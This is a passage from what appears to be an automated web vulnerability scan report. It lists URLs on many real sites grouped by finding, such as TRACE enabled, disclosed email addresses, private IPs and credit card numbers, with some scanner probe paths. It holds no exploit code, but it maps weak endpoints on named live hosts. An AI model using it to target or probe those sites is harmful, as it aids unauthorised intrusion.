23.70. http://support.trust-guard.com/index.php

23.71. http://tengrinews.kz/static/js/twitter.js

23.72. http://tengrinews.kz/tag/891/

23.73. http://webalta.ru/news.html

23.74. https://www.controlscan.com/checkout_invalid.php

23.75. https://www.controlscan.com/shoppingcart.php

23.76. http://www.depthsecurity.com/

23.77. http://www.dmca.com/Protection/Status.aspx

23.78. http://www.eset.com/us/business/products

23.79. http://www.facebook.com/plugins/like.php

23.80. http://www.google.com/search

23.81. http://www.google.com/search

23.82. http://www.google.com/search

23.83. http://www.google.com/search

23.84. http://www.google.com/search

23.85. http://www.google.com/url

23.86. http://www.google.com/url

23.87. http://www.google.com/url

23.88. http://www.googleadservices.com/pagead/conversion/1072501689/

23.89. http://www.integritydefender.com/buyerDetails.php

23.90. http://www.iveco-ptc.spb.ru/

23.91. http://www.manageengine.com/products/security-manager/

23.92. http://www.manageengine.com/products/security-manager/download.html

23.93. http://www.outpost24.com/

23.94. http://www.praetorian.com/external-network-penetration-test.html

23.95. http://www.smpone.com/

23.96. http://www.stillsecure.com/m/

23.97. http://www.trucklist.ru/cars/trucks

24. Cross-domain script include

24.1. http://ad.amgdgt.com/ads/

24.2. http://ad.amgdgt.com/ads/

24.3. http://auto.webalta.ru/

24.4. https://checkout.netsuite.com/s.nl

24.5. https://checkout.netsuite.com/s.nl/c.438708/n.1/sc.4/.f

24.6. http://direct.yandex.ru/

24.7. http://forums.manageengine.com/fbw

24.8. http://games.webalta.ru/

24.9. http://goods.adnectar.com/static/quantcast_1.html

24.10. http://googleads.g.doubleclick.net/pagead/ads

24.11. http://googleads.g.doubleclick.net/pagead/ads

24.12. http://googleads.g.doubleclick.net/pagead/ads

24.13. http://hostpapasupport.com/

24.14. http://ideco-software.ru/products/ims/

24.15. http://learn.shavlik.com/

24.16. http://learn.shavlik.com/shavlik/N

24.17. http://learn.shavlik.com/shavlik/a

24.18. http://mail.ru/

24.19. http://nguard.com/about.aspx

24.20. http://nguard.com/contact.aspx

24.21. http://nguard.com/vulnerability-assessment/

24.22. http://odnoklassniki.ru/

24.23. http://pda.loveplanet.ru/

24.24. http://pixel.fetchback.com/serve/fb/pdc

24.25. http://player.vimeo.com/video/22043447

24.26. http://pogoda.webalta.ru/

24.27. http://pretty.ru/

24.28. http://shopping.netsuite.com/s.nl

24.29. http://solutions.kronos.com/forms/experience2011

24.30. https://store.manageengine.com/service-desk/index.html

24.31. http://tengrinews.kz/tag/891/

24.32. http://webalta.ru/

24.33. http://webalta.ru/news.html

24.34. https://www.controlscan.com/

24.35. https://www.controlscan.com/checkout.php

24.36. https://www.controlscan.com/checkout_invalid.php

24.37. https://www.controlscan.com/pcicompliance.php

24.38. https://www.controlscan.com/shoppingcart.php

24.39. http://www.criticalwatch.com/company/critical-watch-career.aspx

24.40. http://www.criticalwatch.com/company/critical-watch-contact.aspx

24.41. http://www.criticalwatch.com/company/critical-watch-security.aspx

24.42. http://www.criticalwatch.com/company/management.aspx

24.43. http://www.criticalwatch.com/products/mssp.aspx

24.44. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx

24.45. http://www.criticalwatch.com/products/vulnerability-management-overview.aspx

24.46. http://www.criticalwatch.com/solutions/vulnerability-management.aspx

24.47. http://www.criticalwatch.com/support/critical-watch-resource-library.aspx

24.48. http://www.criticalwatch.com/support/critical-watch-support.aspx

24.49. http://www.criticalwatch.com/support/fusionvm-technical-faq.aspx

24.50. http://www.criticalwatch.com/vulnerability-management.aspx

24.51. http://www.criticalwatch.com/vulnerability-scan-trial.aspx

24.52. http://www.customermagnetism.com/

24.53. http://www.customermagnetism.com/case-studies/

24.54. http://www.customermagnetism.com/free-consultation/

24.55. http://www.customermagnetism.com/pay-per-click-services/

24.56. http://www.customermagnetism.com/scripts/prettyPhoto/js/jquery.prettyPhoto.js

24.57. http://www.customermagnetism.com/seo-faq/

24.58. http://www.eset.com/us/

24.59. http://www.eset.com/us/business/products

24.60. http://www.eset.com/us/business/server-security/linux-file

24.61. http://www.eset.com/us/home/smart-security

24.62. http://www.eset.com/us/store

24.63. http://www.eset.com/us/styles/store-new.css

24.64. http://www.facebook.com/plugins/like.php

24.65. http://www.hackerguardian.com/

24.66. http://www.hackerguardian.com/javascript/functions.js

24.67. http://www.integritydefender.com/

24.68. http://www.integritydefender.com/about.php

24.69. http://www.integritydefender.com/account.php

24.70. http://www.integritydefender.com/buyerDetails.php

24.71. http://www.integritydefender.com/contact.php

24.72. http://www.integritydefender.com/faq.php

24.73. http://www.integritydefender.com/personal.php

24.74. http://www.integritydefender.com/privacy.php

24.75. http://www.internetreputationmanagement.com/

24.76. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/images/bg-tab.gif

24.77. http://www.internetreputationmanagement.com/sites/all/themes/newtheme/js/Coolvetica_400.font.js

24.78. http://www.iveco-ptc.spb.ru/

24.79. http://www.iveco-ptc.spb.ru/favicon.ico

24.80. http://www.kayako.com/

24.81. http://www.kronos.com/about/about-kronos.aspx

24.82. http://www.livejournal.com/

24.83. http://www.manageengine.com/me_partners.html

24.84. http://www.manageengine.com/products/applications_manager/application-performance-management.html

24.85. http://www.manageengine.com/products/security-manager/

24.86. http://www.manageengine.com/products/security-manager/download.html

24.87. http://www.manageengine.com/products/security-manager/store.html

24.88. https://www.manageengine.com/network-performance-management.html

24.89. https://www.manageengine.com/products/security-manager/index.html

24.90. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

24.91. http://www.netdiligence.com/

24.92. http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml

24.93. http://www.outpost24.com/

24.94. http://www.outpost24.com/products.html

24.95. http://www.reputationchanger.com/

24.96. http://www.reputationchanger.com/scheduled.html

24.97. http://www.ripoffreport.com/

24.98. http://www.ripoffreport.com/ConsumerResources.aspx

24.99. http://www.ripoffreport.com/CorporateAdvocacy.aspx

24.100. http://www.ripoffreport.com/LoginPage.aspx

24.101. http://www.stillsecure.com/company/testimonials.php

24.102. http://www.stillsecure.com/library/

24.103. http://www.stillsecure.com/m/

24.104. http://www.stillsecure.com/products.php

24.105. http://www.stillsecure.com/services/index.php

24.106. http://www.stillsecure.com/vam/

24.107. http://www.tresware.com/Static-contact.html

24.108. http://www.trust-guard.com/PCI-scanning-s/39.htm

24.109. http://www.trust-guard.com/contact-trust-guard-s/4.htm

25. File upload functionality

26. TRACE method is enabled

26.1. http://d1.openx.org/

26.2. http://games.webalta.ru/

26.3. http://pixel.fetchback.com/

26.4. http://pixel.rubiconproject.com/

26.5. http://pl.yumenetworks.com/

26.6. http://playaudiomessage.com/

26.7. http://player.vimeo.com/

26.8. https://store.manageengine.com/

26.9. http://widgets.digg.com/

26.10. http://www.igotyourindex.com/

26.11. http://www.instantengage.com/

26.12. http://www.integritydefender.com/

26.13. http://www.kayako.com/

26.14. https://www.manageengine.com/

26.15. http://www.reputationprofessor.com/

26.16. http://www.smpone.com/

26.17. http://www.stillsecure.com/

26.18. http://www.tresware.com/

27. Email addresses disclosed

27.1. http://api.flickr.com/services/feeds/photos_public.gne

27.2. http://customer.kronos.com/EdServices/tooltip.js

27.3. http://direct.yandex.ru/

27.4. https://hourly.deploy.com/hmc/report/

27.5. https://hourly.deploy.com/hmc/report/index.cfm

27.6. http://img.en25.com/Web/KronosIncorporated/astadia-gated-forms-ver-3.js

27.7. http://l-stat.livejournal.com/js/

27.8. http://learn.shavlik.com/shavlik/

27.9. http://learn.shavlik.com/shavlik/download.cfm

27.10. http://learn.shavlik.com/shavlik/index.cfm

27.11. http://mail.ru/

27.12. https://secure.trust-guard.com/ResetPassword.php

27.13. http://solutions.kronos.com/forms/experience2011

27.14. https://support.trust-guard.com/index.php

27.15. http://tengrinews.kz/static/js/browserTouchSupport.js

27.16. http://tengrinews.kz/static/js/jquery.cookie.js

27.17. http://tools.manageengine.com/forums/me/forum.php

27.18. http://tools.manageengine.com/forums/security-manager/forum.php

27.19. http://www.criticalwatch.com/company/critical-watch-career.aspx

27.20. http://www.criticalwatch.com/company/critical-watch-contact.aspx

27.21. http://www.criticalwatch.com/products/vulnerability-management-ips.aspx

27.22. http://www.criticalwatch.com/support/critical-watch-support.aspx

27.23. http://www.customermagnetism.com/

27.24. http://www.customermagnetism.com/case-studies/

27.25. http://www.customermagnetism.com/free-consultation/

27.26. http://www.customermagnetism.com/pay-per-click-services/

27.27. http://www.customermagnetism.com/seo-faq/

27.28. http://www.depthsecurity.com/

27.29. http://www.depthsecurity.com/issa-kc-12-2009-presentation.aspx

27.30. https://www.depthsecurity.com/company.aspx

27.31. https://www.depthsecurity.com/contact-us.aspx

27.32. https://www.depthsecurity.com/professional-services.aspx

27.33. https://www.depthsecurity.com/services.aspx

27.34. http://www.dmca.com/Protection/Status.aspx

27.35. http://www.gartner.com/technology/contact/become-a-client.jsp

27.36. http://www.gartner.com/technology/contact/contact_gartner.jsp

27.37. http://www.instantengage.com/open_chat.php

27.38. http://www.integritydefender.com/

27.39. http://www.integritydefender.com/about.php

27.40. http://www.integritydefender.com/account.php

27.41. http://www.integritydefender.com/buyerDetails.php

27.42. http://www.integritydefender.com/contact.php

27.43. http://www.integritydefender.com/faq.php

27.44. http://www.integritydefender.com/js/adminJavaScript.js

27.45. http://www.integritydefender.com/js/contactUs.js

27.46. http://www.integritydefender.com/personal.php

27.47. http://www.integritydefender.com/privacy.php

27.48. http://www.kayako.com/js/cookie.js

27.49. http://www.kronos.com/kronos-site-usage-privacy-policy.aspx

27.50. http://www.manageengine.com/me_partners.html

27.51. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

27.52. http://www.myreputationmanager.com/

27.53. http://www.myreputationmanager.com/faq.html

27.54. http://www.myreputationmanager.com/request_analysis.html

27.55. http://www.myreputationmanager.com/script/jsvalidations.js

27.56. http://www.netsuite.com/portal/javascript/DD_roundies.js

27.57. http://www.praetorian.com/contactus.html

27.58. http://www.removeyourname.com/company/contact.html

27.59. http://www.reputationprofessor.com/

27.60. http://www.ripoffreport.com/

27.61. http://www.ripoffreport.com/Common/script/jquery.hoverIntent.js

27.62. http://www.ripoffreport.com/ConsumerResources.aspx

27.63. http://www.ripoffreport.com/CorporateAdvocacy.aspx

27.64. http://www.ripoffreport.com/LoginPage.aspx

27.65. http://www.smpone.com/Static-contact.html

27.66. http://www.smpone.com/javascript/common.php

27.67. http://www.stillsecure.com/m/

27.68. http://www.supportskins.com/favicon.ico

27.69. http://www.tresware.com/javascript/bbcode.php

27.70. http://www.tresware.com/javascript/common.php

27.71. http://www.trucklist.ru/cars/&rnd=7005287

27.72. http://www.trucklist.ru/cars/trucks

27.73. http://www.trucklist.ru/cars/undefined

27.74. http://www.trucklist.ru/webroot/delivery/js/jquery.cookie.js

28. Private IP addresses disclosed

28.1. http://api.facebook.com/restserver.php

28.2. http://games.mochiads.com/c/g/moon-volley/mvolley.swf

28.3. http://games.mochiads.com/c/p/ef/e5e385166a55a8dceb27b50f280ff784da72d7fb.swf

28.4. http://games.mochiads.com/c/p/moon-volley/774763507f1fe51de5bc05aa7b5114765e0ae832.swf

28.5. http://my.webalta.ru/public/engine/settings.js

28.6. http://player.vimeo.com/video/22043447

28.7. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.8. http://static.ak.fbcdn.net/connect/xd_proxy.php

28.9. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

28.10. http://tools.manageengine.com/forums/me/forum.php

28.11. http://tools.manageengine.com/forums/security-manager/forum.php

28.12. https://www.controlscan.com/checkout.php

28.13. http://www.facebook.com/plugins/like.php

28.14. http://www.facebook.com/plugins/like.php

28.15. http://www.facebook.com/plugins/like.php

28.16. http://www.facebook.com/plugins/like.php

28.17. http://www.facebook.com/plugins/like.php

28.18. http://www.google.com/sdch/rU20-FBA.dct

29. Credit card numbers disclosed

29.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout

29.2. http://ib.adnxs.com/ab

29.3. http://www.kronos.com/email/c/agendalcc11-full.pdf

30. Robots.txt file

30.1. http://945075.r.msn.com/

30.2. http://ad.afy11.net/ad

30.3. http://ad.doubleclick.net/adj/lj.homepage/loggedout

30.4. http://ajax.googleapis.com/ajax/services/feed/load

30.5. http://api.facebook.com/restserver.php

30.6. http://api.flickr.com/services/feeds/photos_public.gne

30.7. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

30.8. http://b.voicefive.com/b

30.9. http://b2bcontext.ru/services/advertisement/getblock

30.10. http://beacon.securestudies.com/scripts/beacon.dll

30.11. http://bs.mail.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0

30.12. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

30.13. http://cache.fimservecdn.com/contents/260/863/863260/lmb-15598-32799-48501.swf

30.14. https://checkout.netsuite.com/robots.txt

30.15. http://clients1.google.com/complete/search

30.16. http://d1.openx.org/ajs.php

30.17. http://d7.zedo.com/img/bh.gif

30.18. http://demr.opt.fimserve.com/adopt/

30.19. http://desk.opt.fimserve.com/adopt/

30.20. http://direct.yandex.ru/

30.21. http://duckduckgo.com/

30.22. http://fonts.googleapis.com/css

30.23. http://forums.comodo.com/rss.php

30.24. http://forums.manageengine.com/fbw

30.25. http://games.mochiads.com/c/g/moon-volley/mvolley.swf

30.26. http://goods.adnectar.com/analytics/get_avia_js

30.27. http://goods43.adnectar.com/analytics/record_impression

30.28. http://googleads.g.doubleclick.net/pagead/ads

30.29. http://i2.duck.co/i/xss.cx.ico

30.30. http://ideco-software.ru/products/ims/

30.31. http://imagesrv.gartner.com/cio/css/main.css

30.32. http://img.en25.com/Web/KronosIncorporated/kronos-ga.js

30.33. http://ioerror.us/bb2-support-key

30.34. http://map.media6degrees.com/orbserv/aopix

30.35. http://maps.google.com/maps

30.36. http://mbox5.offermatica.com/m2/netsuite/mbox/standard

30.37. http://netsuite-www.baynote.net/baynote/customerstatus2

30.38. http://odnoklassniki.ru/

30.39. http://partner-support.wiki.zoho.com/

30.40. http://pixel.fetchback.com/serve/fb/pdc

30.41. http://pixel.quantserve.com/pixel

30.42. http://playaudiomessage.com/play.asp

30.43. http://player.vimeo.com/video/22043447

30.44. http://pretty.ru/

30.45. http://r2.mail.ru/b13057590.swf

30.46. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif

30.47. http://rs.mail.ru/d292152.gif

30.48. http://s0.2mdn.net/1768829/GM_TS_Q3F11_BTPTsunb_300x250.swf

30.49. http://safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchAAGLatCCC6rQgqBbcWAgAPMgW2FgIAAQ

30.50. http://safebrowsing.clients.google.com/safebrowsing/downloads

30.51. http://search.twitter.com/search.json

30.52. http://segment-pixel.invitemedia.com/pixel

30.53. http://solutions.kronos.com/content/experience2011

30.54. http://tengrinews.kz/tag/891/

30.55. http://themes.googleusercontent.com/font

30.56. http://toolbarqueries.clients.google.com/tbproxy/af/query

30.57. http://tools.manageengine.com/forums/security-manager/forum.php

30.58. http://track.pulse360.com/cgi-bin/tracker.cgi

30.59. http://translate.google.com/translate_a/element.js

30.60. http://translate.googleapis.com/translate_a/t

30.61. http://widgets.digg.com/buttons/count

30.62. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

30.63. http://www.customermagnetism.com/

30.64. http://www.dmca.com/Protection/Status.aspx

30.65. http://www.elineaccessories.com/

30.66. http://www.fiddler2.com/fiddler2/updatecheck.asp

30.67. http://www.gartner.com/DisplayDocument

30.68. http://www.google-analytics.com/__utm.gif

30.69. http://www.googleadservices.com/pagead/conversion/1072501689/

30.70. http://www.hackerguardian.com/

30.71. http://www.igotyourindex.com/igyindex.php

30.72. http://www.internetreputationmanagement.com/

30.73. http://www.iveco-ptc.spb.ru/

30.74. http://www.kayako.com/

30.75. http://www.livejournal.com/

30.76. http://www.manageengine.com/products/security-manager/

30.77. https://www.manageengine.com/products/security-manager/index.html

30.78. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/

30.79. http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T

30.80. http://www.reputationprofessor.com/

30.81. http://www.ripoffreport.com/

30.82. https://www.salesforce.com/servlet/servlet.WebToLead

30.83. http://www.smpone.com/

30.84. http://www.tresware.com/

30.85. http://www.trucklist.ru/cars/trucks

31. Cacheable HTTPS response

31.1. https://checkout.netsuite.com/c.438708/js/eset-netsuite.js

31.2. https://checkout.netsuite.com/c.438708/js/lib/mbox.js

31.3. https://checkout.netsuite.com/c.438708/js/lib/mootools-1.2.4-core-yc.js

31.4. https://checkout.netsuite.com/empty.html

31.5. https://checkout.netsuite.com/pages/portal/page_not_found.jsp

31.6. https://checkout.netsuite.com/robots.txt

31.7. https://checkout.netsuite.com/s.nl

31.8. https://customer.kronos.com/Default.asp

31.9. https://employer.unicru.com/asp/home/login.asp

31.10. https://forms.netsuite.com/pages/portal/page_not_found.jsp

31.11. https://hourly.deploy.com/hmc/report/

31.12. https://hourly.deploy.com/hmc/report/index.cfm

31.13. https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042)

31.14. https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529)

31.15. https://secure.trust-guard.com/certificates/Trust-Guard.com

31.16. https://secure.trust-guard.com/certificates/www.YourSite.Com

31.17. https://secure.trust-guard.com/certificates/www.yourwebsitehere.com

31.18. https://secure.trust-guard.com/searchForm.php

31.19. https://store.manageengine.com/

31.20. https://store.manageengine.com/service-desk/index.html

31.21. https://support.comodo.com/

31.22. https://support.comodo.com/index.php

31.23. https://support.trust-guard.com/

31.24. https://support.trust-guard.com/index.php

31.25. https://support.trust-guard.com/visitor/

31.26. https://support.trust-guard.com/visitor/index.php

31.27. https://system.netsuite.com/pages/customerlogin.jsp

31.28. https://www.depthsecurity.com/company.aspx

31.29. https://www.depthsecurity.com/contact-us.aspx

31.30. https://www.depthsecurity.com/professional-services.aspx

31.31. https://www.depthsecurity.com/services.aspx

31.32. https://www.fusionvm.com/FusionVM/DesktopDefault.aspx

31.33. https://www.manageengine.com/network-performance-management.html

31.34. https://www.manageengine.com/products/security-manager/index.html

31.35. https://www.manageengine.com/products/security-manager/security-manager-forum.html

31.36. https://www.trust-guard.com/Templates/New-Green/Images/favicon.ico

32. Multiple content types specified

33. HTML does not specify charset

33.1. https://customer.kronos.com/

33.2. https://customer.kronos.com/Default.asp

33.3. https://customer.kronos.com/portalproblems.asp

33.4. https://customer.kronos.com/user/forgotpassword.asp

33.5. https://customer.kronos.com/user/forgotusername.asp

33.6. https://customer.kronos.com/user/logindenied.asp

33.7. http://duckduckgo.com/post.html

33.8. https://employer.unicru.com/asp/home/login.asp

33.9. http://foreign.dt00.net/zones/zone1.php

33.10. http://foreign.dt00.net/zones/zone23.php

33.11. http://foreign.dt00.net/zones/zone25.php

33.12. http://foreign.dt00.net/zones/zone40.php

33.13. http://goods.adnectar.com/static/quantcast_1.html

33.14. http://ioerror.us/bb2-support-key

33.15. http://kino.webalta.ru/banners.xml

33.16. http://kroogy.com/favicon.ico

33.17. http://l.azjmp.com/f.php

33.18. http://my.webalta.ru/feed/l.php

33.19. http://my.webalta.ru/public/visual/themes/css.php

33.20. http://now.eloqua.com/visitor/v200/svrGP.aspx

33.21. http://playaudiomessage.com/play.asp

33.22. https://support.trust-guard.com/%22https:/

33.23. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/space.gif/%22

33.24. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker2267e00de35e4de2b8c35e57cf7b196a

33.25. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22

33.26. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker41f6e7ea61624161af833141de098f10

33.27. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22

33.28. https://support.trust-guard.com/%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerb2f1dc51b97a4576a37594883bd4b9bf

33.29. https://support.trust-guard.com/%22https:/Netsparker244fdde99d984be78ada09aa500cf940/

33.30. https://support.trust-guard.com/%22https:/support.trust-guard.com/

33.31. https://support.trust-guard.com/%22https:/support.trust-guard.com/Netsparkerac7b500341db48948b5d5d55d09dcbe3/

33.32. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/

33.33. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/Netsparker989ee7b1e5714d6487062ac2beb92c5e/

33.34. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/

33.35. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/Netsparker171fc6625a724216905fe5cbc90dc039/

33.36. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/space.gif/

33.37. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparkerd02156ea79d8460cbd99c4a2c423a280/

33.38. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/

33.39. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparkerb5f88b4d125541c1b6a10fa812588f31/

33.40. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/

33.41. https://support.trust-guard.com/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerdbbf26825bc94fb88869079b322db61d/

33.42. https://support.trust-guard.com/%22javascript:closeProactiveRequest_vvx8pjmw()

33.43. https://support.trust-guard.com/%22javascript:doProactiveRequest_vvx8pjmw()

33.44. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/

33.45. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/

33.46. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/')

33.47. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/'0/Netsparkerd7012d9eae0e491ab28cbfdcfab04fa1/

33.48. https://support.trust-guard.com/%22javascript:startChat_vvx8pjmw(/Netsparker23ea8f008f4c48068c84ca90dd9264b0/

33.49. https://support.trust-guard.com/%22javascript:void(0)

33.50. https://support.trust-guard.com/Netsparker03e6310133444d22bbcca067934a439c.php%253f_ca=css&group=default

33.51. https://support.trust-guard.com/Netsparker19d6b085cb76431fb531d5b2684cc293.php%3f_ca=css&group=default

33.52. https://support.trust-guard.com/Netsparker2ddbbd3d9d9b4064a3ba2cd7fd8f6803.php

33.53. https://support.trust-guard.com/Netsparker32cc6d019ffb4cfaa4426fd037fc04ef.php

33.54. https://support.trust-guard.com/Netsparkercd451056256c40529051e01cf989486a

33.55. https://support.trust-guard.com/index.php

33.56. https://support.trust-guard.com/spicons/Netsparkerb1ba33b014ca47e191835f0abeba3f7b/

33.57. https://support.trust-guard.com/themes/Netsparker9b40ae79bd744aef87f25febd5aeb9f3/

33.58. https://support.trust-guard.com/themes/client_default//Netsparker9e56a71773734e97bc48ea3149ce48e7.gif)

33.59. https://support.trust-guard.com/themes/client_default/Netsparker043e7727e36a47ddb61936f0af81a5e8.gif)%3b

33.60. https://support.trust-guard.com/themes/client_default/Netsparker13749997f7e349eeb0039a51b507d58d.php

33.61. https://support.trust-guard.com/themes/client_default/Netsparker1cda35eb01dc4a42ae9c7ed378d0da88.js

33.62. https://support.trust-guard.com/themes/client_default/Netsparker1e842cbfc9b44f0ab51d781b3a0e56e9.gif)

33.63. https://support.trust-guard.com/themes/client_default/Netsparker3dfe82091ca74bbfa9afff71bf5d2527.gif)

33.64. https://support.trust-guard.com/themes/client_default/Netsparker471242ba1c4549158a07bed3637f9c02/

33.65. https://support.trust-guard.com/themes/client_default/index.php

33.66. https://support.trust-guard.com/themes/client_default/space.gif/

33.67. https://support.trust-guard.com/themes/client_default/staffonline.gif/

33.68. https://support.trust-guard.com/themes/client_default/supportsuite.gif/

33.69. https://support.trust-guard.com/visitor/%22https:/

33.70. https://support.trust-guard.com/visitor/%22https:/Netsparkerd90cb1409e394c5fbfcd68771660fcc7/

33.71. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/

33.72. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/Netsparker35d5c6040fcc4e7b8e79ab19b001e63a/

33.73. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/

33.74. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/Netsparker066842aac8ac4674a195d22e23aa9498/

33.75. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/

33.76. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/Netsparkerb9766c5d4f4b40c78bd633a6258c8ad9/

33.77. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/

33.78. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/space.gif/Netsparker2924845846cb47428b498a00675854c1/

33.79. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/

33.80. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker6f8152c81ee24b75acd643f8e28958ab/

33.81. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/

33.82. https://support.trust-guard.com/visitor/%22https:/support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparkerd9a591c7ccd84cd695c74b212014b334/

33.83. https://support.trust-guard.com/visitor/%22javascript:closeProactiveRequest_vvx8pjmw()

33.84. https://support.trust-guard.com/visitor/%22javascript:doProactiveRequest_vvx8pjmw()

33.85. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/

33.86. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/

33.87. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/')

33.88. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/'0/Netsparker73b16356e987466e8d845e618d4ea653/

33.89. https://support.trust-guard.com/visitor/%22javascript:startChat_vvx8pjmw(/Netsparker8e177151a0de4476b38092314bfa83e9/

33.90. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/%22

33.91. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/space.gif/Netsparker298a189fb87f4b4fba8bba2fe8ae1624

33.92. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/%22

33.93. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/staffonline.gif/Netsparker3c09a1f8515d4357b7bd1f33feed612f

33.94. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/%22

33.95. https://support.trust-guard.com/visitor//%22https://support.trust-guard.com/themes/client_default/supportsuite.gif/Netsparker9160a77a82504db19dfb5fff18d96e07

33.96. https://support.trust-guard.com/visitor//%22javascript:closeProactiveRequest_vvx8pjmw()

33.97. https://support.trust-guard.com/visitor//%22javascript:doProactiveRequest_vvx8pjmw()

33.98. https://support.trust-guard.com/visitor//%22javascript:startChat_vvx8pjmw(/'0/')

33.99. https://support.trust-guard.com/visitor/Netsparkerb41a9abe8d5b422ab58d880203d103bd.php

33.100. https://support.trust-guard.com/visitor/Netsparkerfb734a5866dc47289c8dd804175b8b26/

33.101. https://support.trust-guard.com/visitor/index.php

33.102. http://www.igotyouremail.com/igye_conversion.php

33.103. http://www.myreputationmanager.com/phpinfo.php

33.104. http://www.praetorian.com/contactus.html

33.105. http://www.praetorian.com/external-network-penetration-test.html

33.106. http://www.praetorian.com/images/fieldbg.gif

33.107. http://www.reputationchanger.com/rc.ico

33.108. http://www.reputationprofessor.com/

33.109. https://www.salesforce.com/servlet/servlet.WebToLead

33.110. http://www.smpone.com/javascript/common.php

33.111. http://www.smpone.com/javascript/image_pop.php

33.112. http://www.smpone.com/javascript/showimages.php

33.113. http://www.tresware.com/javascript/bbcode.php

33.114. http://www.tresware.com/javascript/common.php

33.115. http://www.tresware.com/javascript/edittags.php

33.116. http://www.tresware.com/javascript/image_pop.php

33.117. http://www.tresware.com/javascript/showimages.php

34. HTML uses unrecognised charset

34.1. http://b2bcontext.ru/services/advertisement/getblock

34.2. http://ideco-software.ru/products/ims/

34.3. http://mail.ru/

34.4. http://my.webalta.ru/

34.5. http://vkontakte.ru/

34.6. http://vkontakte.ru/login.php

34.7. http://www.gartner.com/include/webtrends.jsp

35. Content type incorrectly stated

35.1. http://an.yandex.ru/code/47934

35.2. http://an.yandex.ru/code/57617

35.3. http://an.yandex.ru/code/66894

35.4. http://ar.voicefive.com/b/rc.pli

35.5. http://auto.webalta.ru/favicon.ico

35.6. http://auto.webalta.ru/public/css/style-auto.css

35.7. http://auto.webalta.ru/public/js/webalta.js

35.8. http://b2bcontext.ru/services/advertisement/getblock

35.9. http://css.loveplanet.ru/3/img/pda/main.js

35.10. http://direct.yandex.ru/pages/direct/_direct-1303387947.js

35.11. http://direct.yandex.ru/pages/index/_index-1303387946.js

35.12. http://duckduckgo.com/b.js

35.13. http://duckduckgo.com/o.js

35.14. http://duckduckgo.com/y.js

35.15. http://event.adxpose.com/event.flow

35.16. http://foreign.dt00.net/zones/form4.js

35.17. http://foreign.dt00.net/zones/zone1.php

35.18. http://foreign.dt00.net/zones/zone23.php

35.19. http://foreign.dt00.net/zones/zone25.php

35.20. http://foreign.dt00.net/zones/zone40.php

35.21. http://games.webalta.ru/public/css/style-games.css

35.22. http://goods.adnectar.com/analytics/get_avia_js

